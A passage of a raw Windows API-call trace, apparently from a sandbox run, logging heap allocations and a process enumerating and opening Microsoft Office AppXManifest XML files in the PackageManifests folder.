Size=0x20) returned 0x883b0 [0098.809] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0098.809] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0098.809] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0098.809] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0098.809] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0098.809] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0098.809] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0098.809] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0098.809] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0098.809] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0098.809] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0098.809] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0098.809] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0098.809] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0098.809] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0098.809] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0098.809] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0098.809] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0098.809] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0098.809] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0098.809] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0098.809] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0098.809] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0098.809] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0098.809] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0098.809] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0098.809] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0098.809] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0098.809] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0098.809] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0098.809] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0098.809] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0098.809] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0098.809] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0098.809] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0098.809] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0098.810] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0098.810] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0098.810] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0098.810] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0098.810] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0098.810] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0098.810] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0098.810] AreFileApisANSI () returned 1 [0098.810] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76188, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0098.810] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0098.810] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76188, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml") returned 105 [0098.810] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001f-040c-1000-0000000ff1ce.xml"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x838fd5e2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x838fd5e2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x83e80c2c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x863)) returned 1 [0098.810] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0098.810] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0098.810] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0098.810] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0098.810] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.810] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.810] FindNextFileW (in: hFindFile=0x78410, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x83ea71ba, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x83ea71ba, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x84214453, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x863, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml", cAlternateFileName="APB0FE~1.XML")) returned 1 [0098.810] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0098.810] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0098.810] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0098.810] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69170 [0098.810] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0098.810] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46748 [0098.810] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69170 | out: hHeap=0x20000) returned 1 [0098.810] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x8c998 [0098.810] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46748 | out: hHeap=0x20000) returned 1 [0098.810] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0098.810] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0098.810] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0098.810] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0098.810] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0098.810] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c998 | out: hHeap=0x20000) returned 1 [0098.810] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0098.810] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0098.811] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35250 [0098.811] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0098.811] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35250 | out: hHeap=0x20000) returned 1 [0098.811] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0098.811] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0098.811] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0098.811] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0098.811] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0098.811] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0098.811] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0098.811] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe0) returned 0x89810 [0098.811] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0098.811] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0098.811] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe0) returned 0x890d0 [0098.811] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x89810 | out: hHeap=0x20000) returned 1 [0098.811] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.811] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.811] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.811] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.811] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x890d0 | out: hHeap=0x20000) returned 1 [0098.811] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0098.811] AreFileApisANSI () returned 1 [0098.811] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 105 [0098.811] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0098.811] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.811] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.811] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0098.811] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0098.811] AreFileApisANSI () returned 1 [0098.811] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76188, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0098.811] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0098.811] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76188, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml") returned 105 [0098.812] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001f-0c0a-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0098.812] GetFileType (hFile=0x418) returned 0x1 [0098.812] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0098.812] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0098.812] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0098.813] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0098.813] CloseHandle (hObject=0x418) returned 1 [0098.813] AreFileApisANSI () returned 1 [0098.813] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76188, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0098.813] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0098.813] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76188, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml") returned 105 [0098.813] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001f-0c0a-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0098.813] GetFileType (hFile=0x418) returned 0x1 [0098.813] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0098.813] CloseHandle (hObject=0x418) returned 1 [0098.813] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0098.813] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0098.813] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0098.814] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0098.814] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0098.814] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0098.814] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0098.814] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0098.814] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0098.814] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0098.814] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0098.814] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0098.814] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0098.814] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0098.814] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0098.814] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0098.814] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0098.814] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0098.814] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0098.814] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0098.814] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0098.814] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0098.814] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0098.814] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0098.814] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0098.814] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0098.814] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0098.814] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0098.814] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0098.814] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0098.814] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0098.814] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0098.814] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0098.814] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0098.814] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0098.814] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0098.814] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0098.814] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0098.814] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0098.814] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0098.815] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0098.815] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0098.815] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0098.815] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0098.815] AreFileApisANSI () returned 1 [0098.815] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76188, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0098.815] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0098.815] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76188, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml") returned 105 [0098.815] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001f-0c0a-1000-0000000ff1ce.xml"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x83ea71ba, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x83ea71ba, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x84214453, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x863)) returned 1 [0098.815] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0098.815] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0098.815] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0098.815] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0098.815] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.815] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.815] FindNextFileW (in: hFindFile=0x78410, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf982bd9c, ftCreationTime.dwHighDateTime=0x1d47c33, ftLastAccessTime.dwLowDateTime=0xf982bd9c, ftLastAccessTime.dwHighDateTime=0x1d47c33, ftLastWriteTime.dwLowDateTime=0xf982bd9c, ftLastWriteTime.dwHighDateTime=0x1d47c33, nFileSizeHigh=0x0, nFileSizeLow=0x34b4b, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AppXManifest.90160000-0027-0000-1000-0000000FF1CE.xml", cAlternateFileName="AP8AF5~1.XML")) returned 1 [0098.815] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0098.815] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0098.815] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0098.815] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68ea0 [0098.815] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0098.815] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46a58 [0098.815] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68ea0 | out: hHeap=0x20000) returned 1 [0098.815] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x8c998 [0098.815] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46a58 | out: hHeap=0x20000) returned 1 [0098.815] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0098.815] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0098.815] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0098.815] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0098.815] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0098.815] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c998 | out: hHeap=0x20000) returned 1 [0098.815] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0098.815] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0098.815] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351f0 [0098.815] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0098.816] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351f0 | out: hHeap=0x20000) returned 1 [0098.816] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0098.816] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0098.816] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0098.816] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0098.816] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0098.816] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0098.816] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0098.816] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe0) returned 0x89728 [0098.816] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0098.816] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0098.816] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe0) returned 0x89640 [0098.816] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x89728 | out: hHeap=0x20000) returned 1 [0098.816] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.816] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.816] 